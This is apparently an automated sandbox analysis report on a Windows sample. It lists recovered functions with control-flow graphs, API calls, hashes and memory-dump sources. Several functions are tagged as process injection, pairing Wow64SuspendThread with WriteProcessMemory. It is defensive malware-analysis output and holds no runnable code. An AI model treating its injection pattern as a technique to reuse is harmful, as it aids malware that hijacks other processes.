                                                                      control_flow_graph 348 bae394-bae3a1 349 bae3ab-bae3c1 348->349 350 bae3a3 348->350 352 bae3d8-bae3e2 349->352 353 bae3c3-bae3d2 349->353 350->349 354 bae3f2-bae3fc 352->354 355 bae3e4-bae3ec 352->355 353->352 357 bae3fe-bae406 354->357 358 bae40c-bae516 call aea890 call af3ea0 LoadIconW call af4338 354->358 355->354 357->358 370 bae518-bae51b 358->370 371 bae526-bae537 358->371 370->371 373 bae539 371->373 374 bae53e-bae56c call ba3c28 371->374 373->374 379 bae571-bae586 374->379 380 bae588-bae58a call bae7d8 379->380 381 bae58f-bae5db call bb1304 call bb1f70 379->381 380->381 387 bae5ec-bae5f3 381->387 388 bae5dd-bae5e9 381->388 388->387
                                                                      APIs
                                                                      • LoadIconW.USER32(00BD4040,MAINICON,?,?,?,00B19410), ref: 00BAE4BC
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2500868091.0000000000ACD000.00000020.00000001.01000000.00000007.sdmp, Offset: 00ACD000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_acd000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: IconLoad
                                                                      • String ID: MAINICON
                                                                      • API String ID: 2457776203-2283262055
                                                                      • Opcode ID: 6b7a2074d793824c5334a84bf81de091391bf24dc4a4f86d8c4c0ec8d5010782
                                                                      • Instruction ID: 2524b4a6ddd932bf2146fc068aed1bf61bda67de64a1989dbd01c35ad8abf018
                                                                      • Opcode Fuzzy Hash: 6b7a2074d793824c5334a84bf81de091391bf24dc4a4f86d8c4c0ec8d5010782
                                                                      • Instruction Fuzzy Hash: E4612B70A042848FDB01EF38D885B957BE5AB15304F4884F9E808CF357DBB59948CB61
                                                                      Function 00BC0B40 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 70processCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 392 bc0b40-bc0bdf call bb0d5c CreateProcessW 399 bc0be1-bc0bed 392->399 400 bc0bf3-bc0c15 392->400 399->400
                                                                      APIs
                                                                      • CreateProcessW.KERNELBASE(00000000,00000000), ref: 00BC0BD8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2500868091.0000000000ACD000.00000020.00000001.01000000.00000007.sdmp, Offset: 00ACD000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_acd000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: CreateProcess
                                                                      • String ID: D
                                                                      • API String ID: 963392458-2746444292
                                                                      • Opcode ID: 4d129efe1de52e25c021b078a40997a984f7ec8fc09012162e748cffea817208
                                                                      • Instruction ID: 659a9e03fea98522073b32529a860c553242b7087e3d9cc3ac484c65a7cf7499
                                                                      • Opcode Fuzzy Hash: 4d129efe1de52e25c021b078a40997a984f7ec8fc09012162e748cffea817208
                                                                      • Instruction Fuzzy Hash: 7B214D70A1420CAFDB04EBE8C852BEEB7FDFB49700F404069F614E7291DB74AA048B55
                                                                      Function 0091AF3C Relevance: 3.1, APIs: 2, Instructions: 77COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 404 91af3c-91af87 GetFileVersionInfoSizeW 408 91af89-91afba GetFileVersionInfoW 404->408 409 91affc-91b011 404->409 413 91afbc-91afd4 408->413 414 91afdf-91aff4 408->414 413->414 417 91afd6-91afdc 413->417 417->414
                                                                      APIs
                                                                      • GetFileVersionInfoSizeW.KERNELBASE(00000000), ref: 0091AF7E
                                                                      • GetFileVersionInfoW.KERNELBASE(00000000), ref: 0091AFB3
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2500868091.000000000090B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0090B000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_90b000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: FileInfoVersion$Size
                                                                      • String ID:
                                                                      • API String ID: 2104008232-0
                                                                      • Opcode ID: 9025fdb617e3be68b2b7e1b7475ed71cc066d4922fcdfae73c8a665c1ecf6868
                                                                      • Instruction ID: fb878bab0baaefd6573d80c1c4d3e864ee8750e931245e6ab9a4d02e05b557ce
                                                                      • Opcode Fuzzy Hash: 9025fdb617e3be68b2b7e1b7475ed71cc066d4922fcdfae73c8a665c1ecf6868
                                                                      • Instruction Fuzzy Hash: 1D213DB1B0060DAFDB15DFB8CC829AEB7FCEB89310B514471B610E3691EB34DE419622
                                                                      Function 00BEB7A5 Relevance: 3.0, APIs: 2, Instructions: 46threadinjectionCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 418 beb7a5-beb7d9 Wow64SuspendThread 420 beb7db 418->420 421 beb805-beb80b 418->421 422 beb7dd-beb7e0 420->422 423 beb7e2-beb804 WriteProcessMemory 420->423 422->421 422->423
                                                                      APIs
                                                                      • Wow64SuspendThread.KERNEL32 ref: 00BEB7A5
                                                                      • WriteProcessMemory.KERNELBASE(?,000000FF,?,?,00000005,00000000), ref: 00BEB7F5
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2542436823.0000000000BEB000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BEB000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_beb000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: MemoryProcessSuspendThreadWow64Write
                                                                      • String ID:
                                                                      • API String ID: 2345646855-0
                                                                      • Opcode ID: b7a10879d2066c743689e0833f586f0bbe6c42a46d3e97db13997739e3d29073
                                                                      • Instruction ID: 40c9961fcf1419f8e12237978bbeba16a6154ece73458420c19a78c87e566b62
                                                                      • Opcode Fuzzy Hash: b7a10879d2066c743689e0833f586f0bbe6c42a46d3e97db13997739e3d29073
                                                                      • Instruction Fuzzy Hash: 87F0593060014D26EB18987D8C05FEEBADBCBC1B30F258369B925C66D4E63088044292
                                                                      Function 00CFCC3B Relevance: 2.6, Strings: 2, Instructions: 131COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 424 cfcc3b-cfcc4e 425 cfcc86-cfcc8c 424->425 426 cfcc50-cfcc63 424->426 429 cfcc8d-cfcc90 425->429 427 cfcc2d-cfcc37 426->427 428 cfcc65 426->428 436 cfcc39 427->436 437 cfcbd7-cfcbf7 427->437 430 cfcc79-cfcc7a 428->430 431 cfcc67-cfcc78 428->431 429->429 432 cfcc92-cfcce1 429->432 434 cfcc7b-cfcc83 430->434 435 cfcce3-cfccfb 430->435 431->430 432->435 438 cfcc27-cfcc28 434->438 439 cfcc85 434->439 441 cfcd07-cfcd0f 435->441 436->424 442 cfcbc0-cfcbc6 436->442 443 cfcbca-cfcbd1 437->443 444 cfcbf9-cfcc12 437->444 438->427 439->425 442->443 443->437 444->438
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2544611345.0000000000CFC000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CFC000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_cfc000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: P$t
                                                                      • API String ID: 0-897426209
                                                                      • Opcode ID: 7fa334fd72bc3d5bf1f73fcfde9ad3b1c31ef972c005667e9749b4e90cf11852
                                                                      • Instruction ID: 825aaadb1ad583cd28f9ed45655f2397a8a52deeeb1896abab6ef442c7b5123e
                                                                      • Opcode Fuzzy Hash: 7fa334fd72bc3d5bf1f73fcfde9ad3b1c31ef972c005667e9749b4e90cf11852
                                                                      • Instruction Fuzzy Hash: 0041EF75E117868FCB168B3889CA5EABF91FF5335071802ADC2D3871D2CB20448ACBC6
                                                                      Function 00BA7B98 Relevance: 1.7, APIs: 1, Instructions: 182COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 447 ba7b98-ba7bba 448 ba7c2c-ba7c34 447->448 449 ba7bbc-ba7bc9 call bacee4 447->449 450 ba7c3d-ba7c41 448->450 451 ba7c36-ba7c38 call b996d4 448->451 449->448 457 ba7bcb-ba7bcf 449->457 455 ba7c4d 450->455 456 ba7c43-ba7c45 450->456 451->450 458 ba7c4f-ba7c57 455->458 456->458 459 ba7c47-ba7c4b 456->459 460 ba7bd1-ba7be3 call baced0 457->460 461 ba7c59-ba7c5b 458->461 462 ba7c62-ba7c64 458->462 459->455 459->458 473 ba7c26-ba7c2a 460->473 474 ba7be5-ba7bf3 call baced0 460->474 461->462 463 ba7c6a-ba7c6e 462->463 464 ba7d31-ba7d3a call b12cf8 462->464 466 ba7c7d-ba7c87 463->466 467 ba7c70-ba7c77 463->467 478 ba7d4b-ba7d52 464->478 479 ba7d3c-ba7d46 call b12928 KiUserCallbackDispatcher 464->479 470 ba7c89-ba7c90 466->470 471 ba7c92-ba7c96 466->471 467->464 467->466 470->471 475 ba7c98-ba7ca1 call b12cf8 470->475 471->475 476 ba7d0c-ba7d13 471->476 473->448 473->460 474->473 490 ba7bf5-ba7c21 474->490 475->478 494 ba7ca7-ba7cc3 call b12928 475->494 476->478 480 ba7d15-ba7d1e call b12cf8 476->480 481 ba7d5d-ba7d6b call ba7ad0 478->481 482 ba7d54-ba7d58 call ba95c0 478->482 479->478 480->478 498 ba7d20-ba7d2f call b12928 480->498 496 ba7d6d-ba7d71 481->496 497 ba7db2-ba7dc7 481->497 482->481 490->473 512 ba7cfa-ba7d0a call b12928 call b996d4 494->512 513 ba7cc5-ba7ccc call b5d2a4 494->513 496->497 500 ba7d73-ba7d77 496->500 498->478 500->497 504 ba7d79-ba7dad call b12928 call b0ab94 * 2 500->504 504->497 512->478 521 ba7cce-ba7cd6 513->521 522 ba7ce1-ba7cf4 call b12928 513->522 521->522 525 ba7cd8-ba7cdf 521->525 522->512 525->512 525->522
                                                                      APIs
                                                                      • KiUserCallbackDispatcher.NTDLL(00000000,00000000,00000000,00BA7DC8), ref: 00BA7D46
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2500868091.0000000000ACD000.00000020.00000001.01000000.00000007.sdmp, Offset: 00ACD000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_acd000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: CallbackDispatcherUser
                                                                      • String ID:
                                                                      • API String ID: 2492992576-0
                                                                      • Opcode ID: af63416ba845460bd630a52403bb75e0c9295cbacd8cedc1deada90a47cef615
                                                                      • Instruction ID: c972dfceb7f9d5885886ac9c16fc0218747b7e7f8416ade7e42283158c5cdf4b
                                                                      • Opcode Fuzzy Hash: af63416ba845460bd630a52403bb75e0c9295cbacd8cedc1deada90a47cef615
                                                                      • Instruction Fuzzy Hash: 49518C7064C2445BDB21AB38CC85BAA77D4EF46710F0845F9EC859B297DE74CC8987A0
                                                                      Function 00BCA114 Relevance: 1.7, APIs: 1, Instructions: 159COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetNativeSystemInfo.KERNELBASE(?), ref: 00BCA1AD
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2500868091.0000000000BCA000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BCA000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_bca000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: InfoNativeSystem
                                                                      • String ID:
                                                                      • API String ID: 1721193555-0
                                                                      • Opcode ID: 2192b3081a6e02d49413d024947aa247b159940df19549d8d952031f23e1a32b
                                                                      • Instruction ID: 462f3ab7d48d92185eb81351417e236bbc40db4feb3c10684c611fe990435b9d
                                                                      • Opcode Fuzzy Hash: 2192b3081a6e02d49413d024947aa247b159940df19549d8d952031f23e1a32b
                                                                      • Instruction Fuzzy Hash: CC613D346092888BC714DB2CE961A6AB7F2FBC5308F24446FE145CB3A6FA759945CB07
                                                                      Function 00BAD5D8 Relevance: 1.6, APIs: 1, Instructions: 118COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SystemParametersInfoW.USER32(00000029,00000000,?,00000000,?,00000000,00B9F730,?,00BACC47,00000000,00000000,00BA783C,6E6F4646,?,?,00000000), ref: 00BAD681
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2500868091.0000000000ACD000.00000020.00000001.01000000.00000007.sdmp, Offset: 00ACD000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_acd000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: InfoParametersSystem
                                                                      • String ID:
                                                                      • API String ID: 3098949447-0
                                                                      • Opcode ID: 8bfea186d0018943c42780c94403ae4a5a1316809e3b7ea8738cc75c244297ce
                                                                      • Instruction ID: 0fed921bd2ac38893e3fe96d867c73d3c62318e9c4a301da478f94341b3b3cb2
                                                                      • Opcode Fuzzy Hash: 8bfea186d0018943c42780c94403ae4a5a1316809e3b7ea8738cc75c244297ce
                                                                      • Instruction Fuzzy Hash: FD4178306042449FD750FBB8CD82B9A37E9AF85700F5480B1BD0CDB796EE31AD458B65
                                                                      Function 00BEB7B0 Relevance: 1.5, APIs: 1, Instructions: 44injectionCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • WriteProcessMemory.KERNELBASE(?,000000FF,?,?,00000005,00000000), ref: 00BEB7F5
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2542436823.0000000000BEB000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BEB000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_beb000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: MemoryProcessWrite
                                                                      • String ID:
                                                                      • API String ID: 3559483778-0
                                                                      • Opcode ID: 1bd102d9b38021d0846288fdb63313cc0bd198b63639c95b7f010267bc66bdcc
                                                                      • Instruction ID: ee76aedb72f59dc0e3926972b5e81c1962895cc01c57d2798b633e4b96e18a4b
                                                                      • Opcode Fuzzy Hash: 1bd102d9b38021d0846288fdb63313cc0bd198b63639c95b7f010267bc66bdcc
                                                                      • Instruction Fuzzy Hash: 46F0243174014D26EF248CBE9C05FEEBBDACBC2730F1983AAB919C62D4E67488054292
                                                                      Function 00BACFFC Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LoadCursorW.USER32(00000000,00000000,?,?,?,00B9F730,00BACB5F,?,?,00000000,?,00B193F0), ref: 00BAD036
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2500868091.0000000000ACD000.00000020.00000001.01000000.00000007.sdmp, Offset: 00ACD000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_acd000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: CursorLoad
                                                                      • String ID:
                                                                      • API String ID: 3238433803-0
                                                                      • Opcode ID: ec80d4291437f1cdc313cca2f933061946e46ac6139ee6a1d4bb4feb06091a5f
                                                                      • Instruction ID: ec0eb07764ccd192abd4c7c5fa3c8d6469be309d1ee0b73fd9376d68d7e958b7
                                                                      • Opcode Fuzzy Hash: ec80d4291437f1cdc313cca2f933061946e46ac6139ee6a1d4bb4feb06091a5f
                                                                      • Instruction Fuzzy Hash: 64F0A0226092002BE6305A3D4CE0F6AB2C8DBC7330F2003B6F93E976D1DA211C0616A0
                                                                      Function 00B094B0 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00B094EB
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2500868091.0000000000ACD000.00000020.00000001.01000000.00000007.sdmp, Offset: 00ACD000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_acd000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: CallbackDispatcherUser
                                                                      • String ID:
                                                                      • API String ID: 2492992576-0
                                                                      • Opcode ID: 5535dc279ff1e877384e686dd9023c36d18ece0e40eb3ee833c40a88ae434141
                                                                      • Instruction ID: e0bbe715bca3811110881742a92ef003db1fcb23f4917bcbe1fd8e336695c67c
                                                                      • Opcode Fuzzy Hash: 5535dc279ff1e877384e686dd9023c36d18ece0e40eb3ee833c40a88ae434141
                                                                      • Instruction Fuzzy Hash: D4F0DA762047119FC310DF5CC88494BB7E9EF89259F044A59F986DB351C771E814CB92
                                                                      Function 00BFE1B4 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • HeapCreate.KERNELBASE(00000000,00000000,00001000,00000000,?,00BFA850,?), ref: 00BFE1CA
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2542436823.0000000000BF9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF9000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_bf9000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: CreateHeap
                                                                      • String ID:
                                                                      • API String ID: 10892065-0
                                                                      • Opcode ID: 73d5968a9555f255f0b032fd4359e6ab799f91cc897122815766eabd077f67d4
                                                                      • Instruction ID: 41e07d41a7866f88a5fc85e0df67195a095aa5d7213c4bb9e8372008184b58ee
                                                                      • Opcode Fuzzy Hash: 73d5968a9555f255f0b032fd4359e6ab799f91cc897122815766eabd077f67d4
                                                                      • Instruction Fuzzy Hash: 1AD05E739903096EEB209EB16D05B7A3ACCE384294F104435B91CC6450E670D982C240
                                                                      Function 00BF9736 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _malloc.LIBCMT ref: 00BF9A18
                                                                        • Part of subcall function 00BFC0B6: __FF_MSGBANNER.LIBCMT ref: 00BFC0D9
                                                                        • Part of subcall function 00BFC0B6: __NMSG_WRITE.LIBCMT ref: 00BFC0E0
                                                                        • Part of subcall function 00BFC0B6: RtlAllocateHeap.NTDLL(00000000,?,00000001), ref: 00BFC12D
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2542436823.0000000000BF9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF9000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_bf9000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: AllocateHeap_malloc
                                                                      • String ID:
                                                                      • API String ID: 501242067-0
                                                                      • Opcode ID: 323aceba6085630cbbd5596d4d5b77c1767793af26893b7f0b52c0e9e1e2273c
                                                                      • Instruction ID: 682ca603ed6ceb6d0bdb2d006c1a167376308bd4f00a654b538a0d678a9d4654
                                                                      • Opcode Fuzzy Hash: 323aceba6085630cbbd5596d4d5b77c1767793af26893b7f0b52c0e9e1e2273c
                                                                      • Instruction Fuzzy Hash: 5BD0A73104828CE5DA64FA78EC8FA773ADDC98135431440E9FE0597563EE52E44DD1B5
                                                                      Function 00BE5600 Relevance: .1, Instructions: 96COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2542436823.0000000000BE4000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BE4000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_be4000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 588746909cfa64d80144b76e8fd91b7856a82ff47f490b7588349f52eb20acb1
                                                                      • Instruction ID: 0c6525c6495fc00b5e50baa9f5e18826f0798507f4005766c747eee101d43abf
                                                                      • Opcode Fuzzy Hash: 588746909cfa64d80144b76e8fd91b7856a82ff47f490b7588349f52eb20acb1
                                                                      • Instruction Fuzzy Hash: 4C31CE790187188BC309EF5AD4600BAB3D5FB84300F10462CEED7432A2EF796857DB92
                                                                      Function 01012596 Relevance: .1, Instructions: 58COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2544611345.0000000001012000.00000020.00000001.01000000.00000007.sdmp, Offset: 01012000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_1012000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: bf4d2842a17e884762e2ba3b62d4c2161b49aa09bb580ee751a4a0e5e11d6f7e
                                                                      • Instruction ID: 22d5026e4ebf2cc43e00b5374db01c593c75803f36a3cfc971a5e68ff007c2bd
                                                                      • Opcode Fuzzy Hash: bf4d2842a17e884762e2ba3b62d4c2161b49aa09bb580ee751a4a0e5e11d6f7e
                                                                      • Instruction Fuzzy Hash: 5A01C03152CB0D4F431DBEE8988907A3285EBD6326F70862DD7C7C7196DA735423E642
                                                                      Function 00CFCD5C Relevance: .0, Instructions: 17COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2544611345.0000000000CFC000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CFC000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_cfc000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 141a431efda3f275782b9303e2120bd369db4d46ed3f9551b093f6bc813fa1b9
                                                                      • Instruction ID: 37e48bee2cf2483a6aae48e6b99662fe92de5924e59467e85b50ea24d2305cb8
                                                                      • Opcode Fuzzy Hash: 141a431efda3f275782b9303e2120bd369db4d46ed3f9551b093f6bc813fa1b9
                                                                      • Instruction Fuzzy Hash: 14D097A2D083030BAB083A341D634C73781EA83364B20410C220386022DE2C0085AE1B

                                                                      Non-executed Functions

                                                                      Function 010B5E5A Relevance: .1, Instructions: 66COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2544611345.00000000010B5000.00000020.00000001.01000000.00000007.sdmp, Offset: 010B5000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_10b5000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8571f62473c0f6bee81e90d3ef4c2753925064566ce971d5b8e87823bbda94bd
                                                                      • Instruction ID: f932bc9e0d705dbc1b28d57dcd8d985024be1fce122902c11642440eb5a6834d
                                                                      • Opcode Fuzzy Hash: 8571f62473c0f6bee81e90d3ef4c2753925064566ce971d5b8e87823bbda94bd
                                                                      • Instruction Fuzzy Hash: BB21BE3A4047828FCB1EEB7484855E9B773FBA1314710A2BAC4878F7A6CB2544478B11
                                                                      Function 00BFF18A Relevance: 16.9, APIs: 11, Instructions: 356COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,?,00000100,?,?,?,?,?,?), ref: 00BFF25A
                                                                      • _malloc.LIBCMT ref: 00BFF293
                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,?,?,00000000,00BF9E02,?,?), ref: 00BFF2C6
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00BF9E02,?,?), ref: 00BFF2E2
                                                                      • MultiByteToWideChar.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00BFF31C
                                                                      • _malloc.LIBCMT ref: 00BFF355
                                                                      • __freea.LIBCMT ref: 00BFF3AD
                                                                      • __freea.LIBCMT ref: 00BFF3B6
                                                                      • _malloc.LIBCMT ref: 00BFF46B
                                                                      • _memset.LIBCMT ref: 00BFF48D
                                                                      • __freea.LIBCMT ref: 00BFF4D8
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2542436823.0000000000BF9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF9000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_bf9000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide$__freea_malloc$_memset
                                                                      • String ID:
                                                                      • API String ID: 3920393152-0
                                                                      • Opcode ID: 42cc1af1854696817feedc0d611dd7528733ca866d5e39edeafd73b5d42928ee
                                                                      • Instruction ID: f83f0302bcc020a4fd21a036fee5dc9113cfac8a9a1ac5c8646cf8dab85bc381
                                                                      • Opcode Fuzzy Hash: 42cc1af1854696817feedc0d611dd7528733ca866d5e39edeafd73b5d42928ee
                                                                      • Instruction Fuzzy Hash: 63C16A7280011FAFCF219FA4DC818BE7BE5EF48354B1545B9FA04A7260D7318EA9DB64
                                                                      Function 00BFB99D Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 114COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • TlsSetValue.KERNEL32(00000000,?,?,00BFA861), ref: 00BFBA60
                                                                      • __init_pointers.LIBCMT ref: 00BFBA6A
                                                                      • __mtterm.LIBCMT ref: 00BFBB20
                                                                        • Part of subcall function 00BFB649: TlsFree.KERNEL32(00C0C65C,00BFA8F6), ref: 00BFB674
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2542436823.0000000000BF9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF9000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_bf9000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: FreeValue__init_pointers__mtterm
                                                                      • String ID: FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                      • API String ID: 3928193026-1030280904
                                                                      • Opcode ID: 4a84ca7cf36528e67e2e1676d9269a053a4a1b3fed6f2304ce9c5246bea32368
                                                                      • Instruction ID: 73d3996e158e0e2f7c7108acb65517ea36325aec8bc8f622bc491d4ce1e3f872
                                                                      • Opcode Fuzzy Hash: 4a84ca7cf36528e67e2e1676d9269a053a4a1b3fed6f2304ce9c5246bea32368
                                                                      • Instruction Fuzzy Hash: E53190318003199AC721AFB5EC55F2E3BE4EB14320B1245BEEA00C39B2DB75848BCB60
                                                                      Function 00C022D3 Relevance: 9.2, APIs: 6, Instructions: 180COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _strlen.LIBCMT ref: 00C02355
                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000000,?,?,00000000,00000000,?,?,?,?,?,00BFF75E), ref: 00C02395
                                                                      • _malloc.LIBCMT ref: 00C023A5
                                                                      • _memset.LIBCMT ref: 00C023CD
                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,00000000,?,?,?,?,?,00BFF75E,?), ref: 00C023E4
                                                                      • __freea.LIBCMT ref: 00C0246C
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2542436823.0000000000BF9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF9000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_bf9000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide$__freea_malloc_memset_strlen
                                                                      • String ID:
                                                                      • API String ID: 3923921168-0
                                                                      • Opcode ID: 5246eab9c9fa1015b25e515cb4412a11950c32429cbf18be7efd486d4165c879
                                                                      • Instruction ID: d6b0e3d2d00466eb7617ae1f929b46ef523074fe0b2646702770a7f4aa94606b
                                                                      • Opcode Fuzzy Hash: 5246eab9c9fa1015b25e515cb4412a11950c32429cbf18be7efd486d4165c879
                                                                      • Instruction Fuzzy Hash: F5516E31900219AECF219FA5DC48DEFBBB9EF89760F244129F524A61A0D7359A41DB60
                                                                      Function 00BFABAA Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 148COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2542436823.0000000000BF9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF9000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_bf9000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: String___crt$Type_memset
                                                                      • String ID:
                                                                      • API String ID: 1957702402-3916222277
                                                                      • Opcode ID: 67e2e56ed8c42aa71e6e6c91f7cfbf5a6962c2b39f5dcae22c63be6ab552a497
                                                                      • Instruction ID: 5bccd9bc28cd468fc5f11718d41f778cca8648cf747818d4eed948670d91199b
                                                                      • Opcode Fuzzy Hash: 67e2e56ed8c42aa71e6e6c91f7cfbf5a6962c2b39f5dcae22c63be6ab552a497
                                                                      • Instruction Fuzzy Hash: 3D5125B410479C5FDB268B249C95BFB7BE8DF06704F1844E8D6CA87183D2319A4D8F61
                                                                      Function 00C04AC0 Relevance: 7.8, APIs: 5, Instructions: 263COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _ValidateScopeTableHandlers.LIBCMT ref: 00C04BC1
                                                                      • __FindPESection.LIBCMT ref: 00C04BDB
